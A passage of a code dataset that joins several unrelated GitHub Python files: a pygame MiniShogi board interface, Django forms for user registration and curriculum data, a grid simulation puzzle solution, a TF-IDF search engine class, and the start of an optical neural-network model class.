screen.blit(text_surface,text_rect)\n\ndef drawboard(): \n screen.fill(menu_area_color)\n n = 1\n l = 'A'\n #draws the backboard with indexes \n for x in range(1,6): \n for y in range(1,6): \n x1 = (squaresize * (x - 1))+x_offset-30\n y1 = (squaresize * (y - 1))+y_offset-30\n pygame.draw.rect(screen, brown_index, [x1,y1,squaresize+60, squaresize+60])\n if y==1:\n draw_text(str(l),50,black,x1+75,y1+17)\n l = chr(ord(l)+1)\n if x==1:\n draw_text(str(n),55,black,x1+15,y1+75)\n n +=1\n \n #Left Board\n for x in range (6): \n pygame.draw.rect(screen,black,[0,(squaresize*x)+5,squaresize,squaresize])\n pygame.draw.rect(screen,brown_square,[0,(squaresize*x)+3+5,squaresize-3,squaresize-3])\n\n #Right Board \n for x in range (6): \n pygame.draw.rect(screen,black,[790,(squaresize*x)+5,squaresize,squaresize])\n pygame.draw.rect(screen,brown_square,[793,(squaresize*x)+3+5,squaresize-3,squaresize-3])\n\n #draws the actual board \n for x in range(1, 6):\n for y in range(1, 6):\n if x!=5 and y!=5:\n pygame.draw.rect(screen, black, [(squaresize * (x - 1))+x_offset, (squaresize * (y - 1))+y_offset,\n squaresize, squaresize])\n \n pygame.draw.rect(screen, brown_square, [((squaresize * (x - 1))+3)+x_offset, ((squaresize * (y - 1))+3)+y_offset,\n squaresize-3, squaresize-3])\n else: \n pygame.draw.rect(screen, black, [(squaresize * (x - 1))+x_offset, (squaresize * (y - 1))+y_offset,\n squaresize+3, squaresize+3])\n \n pygame.draw.rect(screen, brown_square, [(squaresize * (x - 1))+3+x_offset, (squaresize * (y - 1))+3+y_offset,\n squaresize-3, squaresize-3])\n\n# reads in a boardfile as a file and returns a 2 dimensional array of the board \ndef read_file(boardfile):\n\n #gets first line number to check what board we are reading \n with open(boardfile, 'r') as l:\n firstline = l.readline()\n \n if firstline == \"1\\n\": #MiniShogi \n numlist=123456789\n l=[]\n l2=[]\n r1=0 #holds row count \n c1=0 #holds col count \n cflag = 0 \n c=0 #holds temp col count \n with open(boardfile, 'r') as f:\n board_layout=f.read()\n for j in range(19, 121): #starting and ending values start at 3rd row and end at 7th row \n if(board_layout[j]!='\\n' and board_layout[j] not in str(numlist) and j%17 !=4 and board_layout[j]!=\"|\"):\n l2.append(board_layout[j]) \n c+=1\n elif(board_layout[j]=='\\n'): #when the end of line is reached we increment the row and append list l2 into main list l\n if c!=0:\n l.append(l2)\n l2=[]\n r1+=1\n if cflag == 0: #holds column count one time before resetting back to 0 \n cflag = 1 \n c1 = c\n c = 0\n else:\n c = 0\n \n #after getting board we get the list of pieces on left and right board \n f = open(boardfile,'r') \n lines = f.readlines() \n t=[] \n t.append(lines[7])\n t.append(lines[8])\n global left, right \n left = [] \n right = [] \n\n for j in range(len(t[0])): \n if(t[0][j] == \"(\"): \n left.append(t[0][j+1])\n \n for j in range(len(t[1])): \n if(t[1][j] == \"(\"): \n right.append(t[1][j+1])\n \n l= l[::-1]\n return l,r1,c1\n else: \n return 0,0,0\n\n\n#acually draws image onto the board \ndef drawPieces(layout_file):\n global position_list\n position_list=[]\n player_list=[] \n \n #player and enemy player count\n PP = 0\n EP = 0 \n for j in range(5):\n for i in range(10):\n #i/2 because when writing to file, its 5*10 so need to translate 10 indexes to 5 \n if layout_file[j][i]==' ' and i+1<=9: \n if layout_file[j][i+1] == 'K' :\n screen.blit(Enemy_K,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'G' :\n screen.blit(Enemy_G,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'S' :\n screen.blit(Enemy_S,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'R' :\n screen.blit(Enemy_R,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n # position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'P' :\n screen.blit(Enemy_P,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'B' :\n screen.blit(Enemy_B,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n\n\n #append our pieces to a list to keep track of where each piece is\n if layout_file[j][i+1] == 'k' :\n screen.blit(K,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('K') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'g' :\n screen.blit(G,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('G') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 's' :\n screen.blit(S,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('S') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'r' :\n screen.blit(R,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('R') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'p' :\n screen.blit(P,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('P') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'b' :\n screen.blit(B,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('B') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n \n #Promoted Pieces\n elif layout_file[j][i]==\"+\" and i+1<=9: \n #Enemy Pro Pieces\n if layout_file[j][i+1] == 'S' :\n screen.blit(Enemy_S_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n if layout_file[j][i+1] == 'R' :\n screen.blit(Enemy_R_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n if layout_file[j][i+1] == 'P' :\n screen.blit(Enemy_P_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n if layout_file[j][i+1] == 'B' :\n screen.blit(Enemy_B_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n \n #Our Pro Pieces \n if layout_file[j][i+1] == 's' :\n screen.blit(S_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+S') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n\n if layout_file[j][i+1] == 'r' :\n screen.blit(R_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+R') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n \n if layout_file[j][i+1] == 'p' :\n screen.blit(P_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+P') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n\n if layout_file[j][i+1] == 'b' :\n screen.blit(B_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+B') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n \n #after drawing board we draw the posession board \n #left board \n n = 0 \n for l in left: \n if l =='K':\n screen.blit(Enemy_K,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'G':\n screen.blit(Enemy_G,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'R': \n screen.blit(Enemy_R,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'B': \n screen.blit(Enemy_B,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'P': \n screen.blit(Enemy_P,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'S': \n screen.blit(Enemy_S,(0,(squaresize*n)+3+5))\n n+=1\n \n \n #right board \n n = 0 \n for r in right: \n if r =='k':\n screen.blit(K,(793,(squaresize*n)+3+5))\n player_list.append('K1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n n+=1\n elif r == 'g':\n player_list.append('G1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(G,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 'r': \n player_list.append('R1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(R,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 'b': \n player_list.append('B1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(B,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 'p': \n player_list.append('P1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(P,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 's': \n player_list.append('S1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(S,(793,(squaresize*n)+3+5))\n n+=1\n \n\ndef get_moves(): \n moves=[]\n with open (moves_file, 'r') as m:\n moves=m.read().split()\n\n return moves\n\ndef isPiecePresent(x,y):\n selection_coordinates = (0,0)\n position = \"T\"\n for i in range(len(position_list)):\n px,py = position_list[i][1]\n if (x>=px and x<=px+squaresize) and (y>=py and y<=py+squaresize):\n selection_coordinates=(px,py)\n position = position_list[i][0]\n break \n return selection_coordinates,position\n\ndef determine_position(position_x, position_y):\n x=''\n y=''\n n1 = 0 \n n2 = 1\n l = 'a'\n flag = 1\n while(flag == 1): #checks x coordinate \n if position_x >= n1*squaresize+x_offset and position_x<=n2*squaresize+x_offset: \n x = l; \n flag = 0\n else: \n n1+=1\n n2+=1\n l = chr(ord(l)+1)\n if (n2>5): \n break\n\n n1 = 0 \n n2 = 1\n l = 1\n flag = 1\n while(flag == 1): #checks y coordinate \n if position_y >= n1*squaresize+y_offset and position_y<=n2*squaresize+y_offset: \n y = l; \n flag = 0\n else: \n n1+=1\n n2+=1\n l +=1\n if (n2>5): \n break\n \n if x ==\"\" or y ==\"\": \n x = \"\"\n y = \"\" \n \n return x+str(y)\n\n\n#moves list translated physically into dots on board to indicate where the specified piece can move \ndef print_moves(letter_co, m_list):\n legal_moves=[] \n\n off_board = False \n #check if its on board or off board piece \n if len(letter_co) == 2 and letter_co[0]!=\"+\":\n off_board = True \n letter_co = letter_co[0]\n \n if len(letter_co) == 1: \n for moves in m_list:\n if letter_co == moves[0]: \n legal_moves.append(moves[1:])\n if letter_co == \"P\":\n if \"K\" not in moves and \"P\" not in moves and \"R\" not in moves and \"G\" not in moves and \"S\" not in moves and \"B\" not in moves:\n legal_moves.append(moves)\n else: \n for moves in m_list: \n if letter_co in moves: \n legal_moves.append(moves[2:])\n \n\n # 1 - move normal (e3) \n # 2 - eat (xa4) \n # 3 - moving piece to board (@a2) \n\n #HAVE NOT DONE YET \n # 4 - moving to promotion (b5+)\n # 5 - eating piece and promoting (xb5+)\n\n if not(off_board): #onboard piece so we put moves with case 1 and 2 \n for move in legal_moves:\n x = -1\n y = -1\n if len(move) == 2: #just a regular move (#1)\n for i in range(5): \n for j in range(5): \n if move == position_letter_grid_5[i][j]: #e3\n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n elif move[0] == 'x': #piece that is eating (#2)\n for i in range(5): \n for j in range(5): \n if move[1:]== position_letter_grid_5[i][j]: #xa4 to a4 \n x = i \n y = j \n if x!=-1 and y!= -1: \n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n else: # means its case #5 \n for i in range(5): \n for j in range(5): \n if move[1:3]== position_letter_grid_5[i][j]: #xb5+ to b5\n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n elif move[2]==\"+\":#case #4 regular promotion\n for i in range(5): \n for j in range(5): \n if move[:2]== position_letter_grid_5[i][j]: #b5+ to b5\n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n\n else: #offboard piece so case #3\n for move in legal_moves:\n x = -1\n y = -1\n if move[0]=='@':\n for i in range(5): \n for j in range(5): \n if move[1:] == position_letter_grid_5[i][j]: \n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n \n return legal_moves\n\n#pops up the piece if selected \ndef selected_piece_print(p,position): \n x,y = position \n new_position = (x,y-10)\n if p == \"K\" or p == \"K1\":\n screen.blit(K,new_position)\n elif p == \"R\" or p == \"R1\": \n screen.blit(R,new_position)\n elif p == \"B\" or p == \"B1\": \n screen.blit(B,new_position)\n elif p == \"S\" or p == \"S1\": \n screen.blit(S,new_position)\n elif p ==\"P\" or p == \"P1\": \n screen.blit(P,new_position)\n elif p == \"G\" or p == \"G1\":\n screen.blit(G,new_position)\n #promoted pieces \n elif p ==\"+R\":\n screen.blit(R_Pro,new_position)\n elif p ==\"+B\":\n screen.blit(B_Pro,new_position)\n elif p ==\"+S\":\n screen.blit(S_Pro,new_position)\n elif p ==\"+P\":\n screen.blit(P_Pro,new_position)\n\n\ndef update_board(layout,move): \n l = deepcopy(layout) \n piece = move[0].lower()\n if piece == \"+\": \n piece += move[1].lower()\n print(piece)\n\n if len(piece) == 2: #for promoted pieces we check both areas \n for j in range(5):\n for i in range(10):\n if l[j][i]== piece[0] and l[j][i+1]==piece[1]: \n l[j][i] = \" \"\n l[j][i+1] = \" \"\n flag = 0 \n for j in range(5):\n for i in range(10):\n if position_letter_grid_5[j][int(i/2)] in move: \n if flag == 0:\n l[j][i] = piece[0]\n l[j][i+1] = piece[1]\n flag = 1\n else: \n for j in range(5):\n for i in range(10):\n if l[j][i]== piece: \n l[j][i] = \" \"\n\n flag = 0 \n for j in range(5):\n for i in range(10):\n if position_letter_grid_5[j][int(i/2)] in move: \n if flag == 0:\n l[j][i+1] = piece\n flag = 1\n return l \n\n\ndef run(): \n global screen\n screen=pygame.display.set_mode((screen_width,screen_height))\n running = True \n selected = False\n selected_Piece = \"\"\n move_made = False \n while running: \n layout,r,c = read_file(board_file)\n while(not layout and not r and not c): \n layout,r,c = read_file(board_file)\n\n old_layout= deepcopy(layout) #keeps an initial copy for comparison later\n\n drawboard()\n drawPieces(layout)\n moves = get_moves() \n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n running=False\n if event.type==pygame.MOUSEBUTTONDOWN: \n x,y=pygame.mouse.get_pos()\n selection_xy, piece = isPiecePresent(x,y)\n position = determine_position(x,y)\n if selection_xy != (0,0): #its a piece \n selected_Piece = piece\n selected = True \n else: \n # 1.) the piece position is clicked on board\n # 2.) random position on board is clicked \n # 3.) random position off the board is clicked \n\n if position: #3\n if selected: #2\n if (len(selected_Piece) == 2 and selected_Piece[1] == \"1\"): #for moving off board pieces (P1)\n selected_Piece = selected_Piece[0]\n \n for p in moves: \n if position in p and \"@\" in p:\n move = p\n print(move)\n output_file=open(\"output.txt\", \"w\")\n output_file.write(move)\n output_file.close()\n new_layout = update_board(layout, move) \n #updates the board with new move made by us \n layout,r,c = read_file(board_file)\n while True: \n drawboard() \n drawPieces(new_layout)\n pygame.display.update()\n layout,r,c = read_file(board_file)\n if layout!= old_layout: #when the board gets updated with the move computer makes, it will break out \n break\n for i in range(5): \n for j in range(10): \n print(new_layout[i][j],end=\"\")\n print(\"\")\n \n break\n else:\n #special case p does not have the letter in the move so we just check for the position \n if selected_Piece == \"P\": \n for p in moves: \n if position in p and \"K\" not in p and \"R\" not in p and \"S\" not in p and \"B\" not in p and \"G\" not in p and \"P\" not in p:\n move = p\n print(move)\n print(position)\n output_file=open(\"output.txt\", \"w\")\n output_file.write(move)\n output_file.close()\n new_layout = update_board(layout, move) \n #updates the board with new move made by us \n layout,r,c = read_file(board_file)\n while True: \n drawboard() \n drawPieces(new_layout)\n pygame.display.update()\n layout,r,c = read_file(board_file)\n if layout!= old_layout: #when the board gets updated with the move computer makes, it will break out \n break\n for i in range(5): \n for j in range(10): \n print(new_layout[i][j],end=\"\")\n print(\"\")\n break \n else:\n for p in moves: \n if position in p and selected_Piece in p:\n move = p\n print(move)\n print(position)\n output_file=open(\"output.txt\", \"w\")\n output_file.write(move)\n output_file.close()\n new_layout = update_board(layout, move) \n #updates the board with new move made by us \n layout,r,c = read_file(board_file)\n while True: \n drawboard() \n drawPieces(new_layout)\n pygame.display.update()\n layout,r,c = read_file(board_file)\n if layout!= old_layout: #when the board gets updated with the move computer makes, it will break out \n break\n for i in range(5): \n for j in range(10): \n print(new_layout[i][j],end=\"\")\n print(\"\")\n break \n \n selected_Piece =\"\"\n selected = False \n\n if selected == True: \n #pops up the selected piece \n selected_piece_print(piece, selection_xy)\n legal_moves = print_moves(piece, moves)\n\n pygame.display.update()\n","repo_name":"Tylereck81/Polygame-","sub_path":"minishogi.py","file_name":"minishogi.py","file_ext":"py","file_size_in_byte":28575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12697364206","text":"from django import forms\nfrom django.forms import HiddenInput\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, HTML, Button, Row, Field\nfrom crispy_forms.bootstrap import AppendedText, PrependedText, FormActions\nfrom api_gateway.api import buscar_db\n\n\nclass UserRegisterForm(UserCreationForm):\n\n email = forms.EmailField()\n\n rol = forms.ChoiceField(\n choices=(\n ('1', \"Admin\"),\n ('2', \"Director de carrera\"),\n ('3', \"Docente\"),\n ('4', \"Evaluador\"),\n ('5', \"Especialista\")\n ),\n widget=forms.Select,\n initial='1',\n required=True,\n help_text=\"Seleccione su rol\"\n )\n\n class Meta:\n model = User\n fields = ['rol', 'username', 'email', 'password1', 'password2']\n\n def save(self, commit=True):\n user = super(UserRegisterForm, self).save(commit=False)\n user.rol = self.cleaned_data[\"rol\"]\n if commit:\n user.save()\n return user\n\n\nclass keyForm(forms.Form):\n\n clave_multifactor = forms.CharField(help_text=\"Se ha enviado la clave multifactor a su email\", required=True, widget=forms.PasswordInput())\n\n helper = FormHelper()\n helper.form_method = 'POST'\n helper.form_class = 'form-horizontal'\n helper.layout = Layout(\n Field('clave_multifactor', css_class='input-xlarge'),\n FormActions(\n Submit('save_changes', 'Run', css_class=\"btn-primary\"),\n # Submit('cancel', 'Cancel'),\n )\n )\n\n def __init__(self, *args, **kwargs):\n super(keyForm, self).__init__(*args, **kwargs)\n\n\nclass planEstudioForm(forms.Form):\n nombrePlan = forms.CharField(label='Nombre', max_length=30)\n cargaHorariaTotal = forms.FloatField(label='Carga Horaria Total')\n resolucionConeau = forms.CharField(label='Resolucion de la CONEAU', max_length=30)\n resolucionMinEdu = forms.CharField(label='Resolucion del Min de Edu', max_length=30)\n resolucionRectoral = forms.CharField(label='Resolucion Rectoral', max_length=30)\n\nclass materiaForm(forms.Form):\n materia = forms.CharField(label='Nombre de la Materia', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Materia', max_length=80)\n\nclass curricularForm(forms.Form):\n contenido = forms.CharField(label='Nombre del Contenido Curricular', max_length=80)\n descriptor = forms.CharField(label='Descripcion del Contenido Curricular', max_length=80)\n\nclass competenciaForm(forms.Form):\n competencia = forms.CharField(label='Nombre de la Competencia', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Competencia', max_length=80)\n\nclass capacidadForm(forms.Form):\n capacidad = forms.CharField(label='Nombre de la Capacidad', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Capacidad', max_length=80)\n\nclass unidadForm(forms.Form):\n unidad = forms.CharField(label='Nombre de la Unidad', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Unidad', max_length=80)\n\nclass actaForm(forms.Form):\n acta = forms.CharField(label='Nombre del Acta', max_length=80)\n descriptor = forms.CharField(label='Descripcion del Acta', max_length=80)\n\n\nclass agregarMateriaForm(forms.Form):\n\n materia = forms.ChoiceField(choices=[], help_text=\"Seleccione la materia a sumar a la carrera\")\n\n helper = FormHelper()\n helper.form_method = 'POST'\n helper.form_class = 'form-horizontal'\n helper.layout = Layout(\n 'materia',\n\n FormActions(\n Submit('save_changes', 'Agregar Materia', css_class=\"btn-primary\"),\n # Submit('cancel', 'Cancel'),\n )\n )\n\n def __init__(self, *args, **kwargs):\n super(agregarMateriaForm, self).__init__(*args, **kwargs)\n\n df = buscar_db('materias')\n\n # self.fields['materia'].choices = df['nombre'].tolist()\n\n self.fields['materia'].choices = [(x, x) for x in df['nombre'].tolist()]","repo_name":"marianomatelo/ingsoftavanz","sub_path":"pg/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393028712","text":"input = __import__('sys').stdin.readline\n\ndi = [(0, 1), (1, 0), (0, -1), (-1, 0)]\nr, c, t = map(int,input().split())\nboard = [list(map(int, input().split())) for _ in range(r)]\ncleaner = []\nfor i in range(r):\n if board[i][0] == -1:\n cleaner.append(i)\n\ndef confusion(board, r, c):\n tmp = [[0] * c for _ in range(r)]\n\n for i in range(r):\n for j in range(c):\n if board[i][j]>=5:\n val = board[i][j] // 5\n for dx, dy in di:\n nx, ny = i + dx, j + dy\n if 0<=nx= 0 and y1 == 0:\n board[x1][y1] = board[x1 - 1][y1]\n x1 -= 1\n elif x1 == 0 and y1 + 1 < c:\n board[x1][y1] = board[x1][y1 + 1]\n y1 += 1\n elif y1 == c - 1 and x1 + 1 <= cleaner[0]:\n board[x1][y1] = board[x1 + 1][y1]\n x1 += 1\n elif x1 == cleaner[0] and y1 - 2 >= 0:\n board[x1][y1] = board[x1][y1 - 1]\n y1 -= 1\n board[x1][y1] = 0\n x1, y1 = cleaner[1] + 1, 0\n while x1 != cleaner[1] or y1 != 1:\n if x1 + 1 < r and y1 == 0:\n board[x1][y1] = board[x1 + 1][y1]\n x1 += 1\n elif x1 == r - 1 and y1 + 1 < c:\n board[x1][y1] = board[x1][y1 + 1]\n y1 += 1\n elif y1 == c - 1 and x1 - 1 >= cleaner[1]:\n board[x1][y1] = board[x1 - 1][y1]\n x1 -= 1\n elif x1 == cleaner[1] and y1 - 2 >= 0:\n board[x1][y1] = board[x1][y1 - 1]\n y1 -= 1\n board[x1][y1] = 0\n\n\nfor _ in range(t):\n confusion(board, r, c)\n clean(board,r, c, cleaner)\nans = 0\nfor ele in board:\n ans += sum(ele)\nprint(ans + 2)","repo_name":"112224/algorithm","sub_path":"python3/17144 미세먼지 안녕!.py","file_name":"17144 미세먼지 안녕!.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7565683398","text":"from SearchEngine import SearchEngine\nimport os\n\nfrom natsort import natsorted\nfrom config import Folder\nimport numpy as np\n\nimport pandas as pd\n\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\n\ndef checkTermInObject(term, obj, docId, calcNo):\n if term in obj:\n obj[term][0][docId + 1] = calcNo\n else:\n obj[term] = []\n obj[term].append({})\n obj[term][0][docId + 1] = calcNo\n\n\nclass TF_IDF:\n se = SearchEngine()\n folder = Folder()\n docs = []\n docID = 1\n pos_index = se.pos_index\n\n # Number of Docs => self.folder.numberOfDocs(self.folder.folder_names)\n def getDocs(self):\n for folder_name in self.folder.folder_names:\n # # Open files.\n file_names = natsorted(os.listdir(folder_name))\n # For every file.\n for file_name in file_names:\n # Read file contents.\n stuff = self.se.read_file(folder_name + '/' + file_name)\n final_token_list = self.se.preprocessing(stuff)\n self.docs.append(final_token_list)\n return self.docs\n\n def compute_weight_TF(self):\n docs = self.getDocs()\n tf = {}\n docSize = []\n for i in range(len(docs)):\n docSize.append(len(docs[i]))\n\n for term in self.pos_index:\n for docId in range(self.folder.numberOfDocs(self.folder.folder_names)):\n\n if self.pos_index[term][1].get(docId + 1) is not None:\n # term frequency TF => len(self.pos_index[term][1].get(docId + 1))\n tfNo = 1 + np.log10(len(self.pos_index[term][1].get(docId + 1)))\n # print(docSize[docId])\n checkTermInObject(term, tf, docId, round(tfNo, 5))\n\n else:\n checkTermInObject(term, tf, docId, 0)\n return tf\n\n def computeIDF(self):\n idf = {}\n for term in self.pos_index:\n if self.pos_index[term][1] is not None:\n # DF for a term = self.pos_index[term][0]\n n = np.log10(self.folder.numberOfDocs(self.folder.folder_names) / self.computeDF(term))\n idf[term] = round(n, 5)\n\n return idf\n\n def computeDF(self, term):\n return self.pos_index[term][0]\n\n def computeTFIDF_weight(self, tf, idf):\n tfIdf = {}\n for term in tf:\n for docId in range(self.folder.numberOfDocs(self.folder.folder_names)):\n tfIdfNo = tf[term][0].get(docId + 1) * idf[term]\n checkTermInObject(term, tfIdf, docId, round(tfIdfNo, 5))\n\n return tfIdf\n\n def normalized_tfidf(self, tf_idf, document_length):\n normalized_tf_idf = {}\n docs_length = list(document_length.values())\n for i in range(len(docs_length)):\n for term in tf_idf:\n n_tfidf = tf_idf[term][0].get(i + 1) / docs_length[i]\n checkTermInObject(term, normalized_tf_idf, i, round(n_tfidf, 5))\n\n return normalized_tf_idf\n\n def tf_format(self, tf):\n terms_list = list(tf.keys())\n tfNo = []\n for term in terms_list:\n tfNo.append(list(tf[term][0].values()))\n\n df = pd.DataFrame(tfNo, columns=self.folder.fileNames(self.folder.folder_names), index=terms_list)\n print(df)\n\n def idf_format(self, idf):\n terms_list = list(idf.keys())\n tfNo = []\n dfTerms = []\n for term in terms_list:\n tfNo.append(idf[term])\n dfTerms.append(self.computeDF(term))\n\n data = {'Term ': terms_list, ' df ': dfTerms, ' IDF ': tfNo}\n df = pd.DataFrame(data, columns=['Term ', ' df ', ' IDF '])\n print(df)\n\n def tf_idf_format(self, tfIDF):\n terms_list = list(tfIDF.keys())\n tf_idf = []\n for term in terms_list:\n tf_idf.append(list(tfIDF[term][0].values()))\n\n df = pd.DataFrame(tf_idf, columns=self.folder.fileNames(self.folder.folder_names), index=terms_list)\n print(df)\n\n def normalized_tf_idf_format(self, normalized_tfidf):\n terms_list = list(normalized_tfidf.keys())\n n_tf_idf = []\n for term in terms_list:\n n_tf_idf.append((list(normalized_tfidf[term][0].values())))\n print(n_tf_idf)\n\n df = pd.DataFrame(n_tf_idf, columns=self.folder.fileNames(self.folder.folder_names), index=terms_list)\n print(df)\n","repo_name":"Mostafa54225/Information-Retrieval","sub_path":"TF_IDF.py","file_name":"TF_IDF.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16413709312","text":"from project_defs import *\r\nimport matplotlib.pyplot as plt\r\n\r\nclass CustomModel():\r\n def __init__(self,\r\n model_name,\r\n inputs_path,\r\n targets_path,\r\n test_inputs_path,\r\n test_lables_path,\r\n num_of_samples,\r\n num_of_layers,\r\n layers_distance_pxls,\r\n wavelen_in_pxls,\r\n nm,\r\n learning_rate,\r\n batch_size,\r\n epochs,\r\n dir_to_save,\r\n name_to_save,\r\n weights_name,\r\n prop_input = True,\r\n rescaling_factor = None,\r\n padding_factor = None,\r\n amp_modulation = False,\r\n phase_modulation = False,\r\n force_shape = None,\r\n **kwargs):\r\n\r\n self.model_name = model_name\r\n self.inputs_path = inputs_path\r\n self.targets_path = targets_path\r\n self.test_inputs_path = test_inputs_path\r\n self.test_labels_path = test_lables_path\r\n self.num_of_samples = num_of_samples\r\n self.inputs = None\r\n self.targets = None\r\n self.tests_inputs = None\r\n self.test_targets_labels = None\r\n self.num_of_layers = num_of_layers\r\n self.z = layers_distance_pxls\r\n self.wavelen = wavelen_in_pxls\r\n self.amp_mod = amp_modulation\r\n self.phase_mod = phase_modulation\r\n self.rescaling_f = rescaling_factor\r\n self.padding_f = padding_factor\r\n self.nm = nm\r\n self.lr = learning_rate\r\n self.batch_size = batch_size\r\n self.epochs = epochs\r\n self.prop_input = prop_input\r\n self.padz = 0\r\n self.padding = None\r\n self.shape = None\r\n self.layers = []\r\n self.weights = []\r\n self.model = None\r\n self.dir_to_save = dir_to_save\r\n self.name_to_save = name_to_save\r\n self.weights_name = weights_name\r\n\r\n self.force_shape = force_shape\r\n self.running_model = False\r\n\r\n\r\n self.printHeader()\r\n print(\"**** Processing Parameters ****\\n\")\r\n self.processParams()\r\n print(\"**** Finished Processing Parameters ****\\n\")\r\n print(\"**** Building Model ****\")\r\n self.buildModel()\r\n print(\"**** Finished Building Model ****\\n\")\r\n # print(\"**** Training Model ****\")\r\n # self.trainModel()\r\n # print(\"**** Finished Training Model ****\")\r\n\r\n\r\n def processParams(self):\r\n print(\"---- processing model parameters ----\\n\")\r\n if \"ubyte\" in self.inputs_path:\r\n self.inputs = idx2numpy.convert_from_file(self.inputs_path)[:self.num_of_samples] / 255\r\n self.targets= idx2numpy.convert_from_file(self.targets_path)[:self.num_of_samples]\r\n self.tests_inputs = idx2numpy.convert_from_file(self.test_inputs_path) / 255\r\n self.test_targets_labels = 